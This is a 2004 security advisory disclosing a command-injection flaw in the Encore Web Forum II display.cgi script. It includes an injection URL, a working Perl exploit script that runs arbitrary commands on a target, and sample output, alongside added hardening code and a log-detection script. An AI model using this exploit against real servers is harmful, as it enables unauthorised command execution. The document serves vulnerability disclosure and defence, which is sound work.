[UNIX] Aborior's Encore Web Forum Remote Vulnerability and Exploit

From: SecuriTeam (support_at_securiteam.com)
Date: 04/05/04

    To: list@securiteam.com
    Date: 5 Apr 2004 13:52:06 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Aborior's Encore Web Forum Remote Vulnerability and Exploit
    ------------------------------------------------------------------------

    SUMMARY

    " <http://www.aborior.com/encore/index.shtml> Encore Web Forum II is an
    elegant forum system for the World Wide Web. It creates a venue for
    discussion and interaction between visitors of a website. But more than a
    forum, it is a vibrant online community builder and communication tool,
    offering such features as user polls, chat rooms, private messaging, an
    e-mail mailing list, e-mail notification, post pre-moderation, message
    reports, file attachments, IP banning, themes and a myriad of others."

    The web forum software performs insufficient input sanitization. Direct
    execution of arbitrary commands with the webserver's permissions is possible.

    DETAILS

    Vulnerable Systems:
     * Aborior's Encore version II

    There is insufficient sanitizing of the 'file' variable in the display.cgi
    script that resides in the root forum directory (forumcgi). A command
    embedded within the 'file' variable is executed automatically. The attack
    can be carried out using only a browser. Example:
    http://www.target.com/encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=|uname -a|
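    The advisory does not name the code path behind the bug, but a payload delimited by pipe characters is the signature of Perl's two-argument open(), which takes the open mode from the string it is given. The following is an added example, not Encore's own code, showing that pattern beside a hardened replacement; the function names and template directory are assumptions made for illustration.

```perl
#!/usr/bin/perl
# Added example, not Encore's own code: the two-argument open() pattern
# behind this class of bug, beside a hardened replacement. Function names
# and the template directory are assumptions for illustration.
use strict;
use warnings;
use File::Spec;

my $TEMPLATE_DIR = '/var/www/encore/templates';   # assumed location

# VULNERABLE: two-argument open() derives the mode from the string itself.
# A value such as "|uname -a|" therefore opens a pipe to a shell command
# instead of a file, and prefixing a directory does not help because a
# trailing '|' still selects pipe mode.
sub read_template_unsafe {
    my ($file) = @_;
    open(my $fh, "$TEMPLATE_DIR/$file") or return undef;   # mode comes from data
    local $/;
    my $body = <$fh>;
    close $fh;
    return $body;
}

# Allow-list check: a single plain filename component that starts with a
# letter, digit or underscore and contains no separators, no leading dot
# and no shell or open() metacharacters.
sub is_safe_template_name {
    my ($file) = @_;
    return 0 unless defined $file;
    return $file =~ /\A[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}\z/ ? 1 : 0;
}

# HARDENED: validate the name, build the path explicitly, and use
# three-argument open() so the mode is fixed to read-only regardless of
# what the name contains.
sub read_template_safe {
    my ($file) = @_;
    return undef unless is_safe_template_name($file);
    my $path = File::Spec->catfile($TEMPLATE_DIR, $file);
    open(my $fh, '<', $path) or return undef;
    local $/;
    my $body = <$fh>;
    close $fh;
    return $body;
}

# Constructed inputs showing what the allow-list accepts and rejects.
for my $name ('anonymous', 'default.tmpl', '|uname -a|', '../../etc/passwd', '.htpasswd') {
    printf "%-20s %s\n", $name, is_safe_template_name($name) ? 'accepted' : 'rejected';
}
```

    The three-argument form is the real fix: with the mode fixed to '<', the value is only ever a filename. The allow-list is defence in depth that also closes directory traversal. Running a CGI under perl -T (taint mode) would additionally refuse a piped open on user-supplied data with an "Insecure dependency" error, which is a cheap way to surface this class of bug in other scripts.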

    A proof-of-concept exploit is provided which runs the commands 'uname -a;
    id; uptime;' on the server:

    ############################################################
    #!/usr/bin/perl -w
    #
    # Remote Exploit Aborior's Encore Web Forum by Schizoprenic
    # Bug found by k-159 from g-security.tk

    require LWP::UserAgent;
    use Getopt::Std;

    getopts('t:d:c:');
    our($opt_t, $opt_d, $opt_c);

    my $target = $opt_t;
    my $dir = $opt_d;
    my $cmd = $opt_c;

    print "Remote Exploit Aborior's Encore Web Forum by Schizoprenic\n";
    print "Xnuxer Research Laboratory (http://www.infosekuriti.com)\n";
    print "Target: $target\n";
    print "Path Dir: $dir\n";
    print "Command: $cmd\n";

    my $ua = LWP::UserAgent->new;
    $ua->agent("IE/6.0 Windows");
    $ua->timeout(10);
    $ua->env_proxy;

    # The command is placed between pipe characters in the 'file' parameter.
    my $req =
    "http://$target$dir/display.cgi?preftemp=temp&page=anonymous&file=|$cmd|";

    my $response = $ua->get($req);
    print "--------------------RESULT--------------------\n";

    if ($response->is_success) {
            print $response->content;
    } else {
            die $response->status_line;
    }

    print "----------------------------------------------\n";

    # EOF by Xnuxer

    A test run yields the following:
    [xnuxer@Server xnuxer]$ perl xdisp.pl -t www.xxxxxxx.com -d /encore/forumcgi -c "uname -a;id;uptime;"
    Remote Exploit Aborior's Encore Web Forum by Schizoprenic
    Xnuxer Research Laboratory (http://www.infosekuriti.com)
    Target: www.xxxxxxx.com
    Path Dir: /encore/forumcgi
    Command: uname -a;id;uptime;
    --------------------RESULT--------------------
    Linux ns1.xxxxxxx.com 2.4.20-20.9.2INLDSmpIPvsDs #1 SMP Thu Dec 4 19:28:44 EST 2003 i686 i686 i386 GNU/Linux
    uid=48(apache) gid=48(apache)
    groups=48(apache),2523(psaserv),10044(webdev)
     01:41:08 up 17 days, 6:00, 0 users, load average: 0.00, 0.03, 0.00
    ----------------------------------------------
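    The request above leaves a distinctive trace in the webserver's access log: a GET to display.cgi whose 'file' parameter carries a pipe or other shell metacharacter, possibly URL-encoded. The following is an added example, not part of the advisory, that scans Apache combined-format log lines for that pattern; the log lines are constructed for illustration and the addresses and timestamps in them are invented.

```perl
#!/usr/bin/perl
# Added example, not part of the advisory: flag access-log requests to
# display.cgi whose 'file' parameter contains characters that a shell or
# two-argument open() would interpret. Log lines below are constructed.
use strict;
use warnings;

my @log = (
  '10.0.0.5 - - [05/Apr/2004:13:52:06 +0200] "GET /encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=anonymous HTTP/1.1" 200 4321 "-" "Mozilla/4.0"',
  '10.0.0.9 - - [05/Apr/2004:13:53:10 +0200] "GET /encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=%7Cuname%20-a%7C HTTP/1.1" 200 512 "-" "IE/6.0 Windows"',
  '10.0.0.9 - - [05/Apr/2004:13:53:40 +0200] "GET /encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=|id| HTTP/1.1" 200 80 "-" "IE/6.0 Windows"',
  '10.0.0.7 - - [05/Apr/2004:13:54:01 +0200] "GET /encore/index.shtml HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
);

# Minimal URL decoding (percent-escapes and '+'), kept inline so the
# script has no dependency outside core Perl.
sub url_decode {
    my ($s) = @_;
    $s =~ tr/+/ /;
    $s =~ s/%([0-9A-Fa-f]{2})/chr(hex($1))/ge;
    return $s;
}

# Returns the decoded 'file' value when the request targets display.cgi
# and that value contains pipe, command-separator, redirection, backtick,
# variable-expansion, NUL or traversal sequences; otherwise undef.
sub suspicious_file_param {
    my ($line) = @_;
    return undef unless $line =~ m{"(?:GET|POST)\s+\S*?/display\.cgi\?(\S*)\s+HTTP/}i;
    my $query = $1;
    for my $pair (split /&/, $query) {
        my ($k, $v) = split /=/, $pair, 2;
        next unless defined $k && $k eq 'file';
        $v = url_decode(defined $v ? $v : '');
        return $v if $v =~ /[|;`\$<>\x00]/ || $v =~ m{\.\./};
    }
    return undef;
}

for my $line (@log) {
    my $hit = suspicious_file_param($line);
    next unless defined $hit;
    my ($ip, $ts) = $line =~ /^(\S+) \S+ \S+ \[([^\]]+)\]/;
    printf "ALERT %s %s file=%s\n", $ip, $ts, $hit;
}
```

    Decoding before matching matters: the second constructed line encodes the pipes as %7C and would slip past a literal search for '|'. The same check generalises to any CGI parameter that ends up in a filename, so the parameter name is the only thing to change when applying it to other scripts.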

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:xnuxer@hackermail.com> k159
    from g-security.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

